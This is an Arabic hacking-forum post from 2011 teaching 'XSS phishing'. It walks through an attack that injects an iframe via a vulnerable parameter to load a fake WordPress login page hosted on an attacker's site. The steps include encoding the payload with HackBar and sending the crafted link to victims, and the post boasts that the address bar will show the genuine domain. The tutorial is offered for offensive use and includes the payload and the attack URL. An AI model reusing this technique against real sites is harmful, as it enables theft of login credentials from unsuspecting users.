حمل الفيديو من هنا تحميييييل
~~~~~~~~~~~~~~~~~~~~
~
بسم الله الرحمن الرحيم
السلام عليكم
معكم IronMan من
شبكة العناكب الاحترافية
درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS
phishing
اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا
لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟
سنرى الطريقة تابعوا معي
هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل
httP://mysite.com/phishing.php
لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس
نأتي الان لخطوة الحقن وهي استخدام هذا الكود
<****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******>
لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك
لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة
لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم
عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar
تلك لاضافة في الفاير فوكس
ابحث عنها في قوقل ولا تكون كسلان
وليصبح الرابط في النهاية
http://localhost/mblue_u/test.php?x=...E%3C/******%3E
وبكذا ترسلوا الرابط للضحية
او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع
وبكذا انتهى
الدرس
اخوكم / ايرون مان هكر
شبكة العناكب الاحترافية
vbspiders.com/vb/
09-10-2011, 03:33 PM
جديد استخدامات xss وهي الـ phishing login 
العرض الشجري
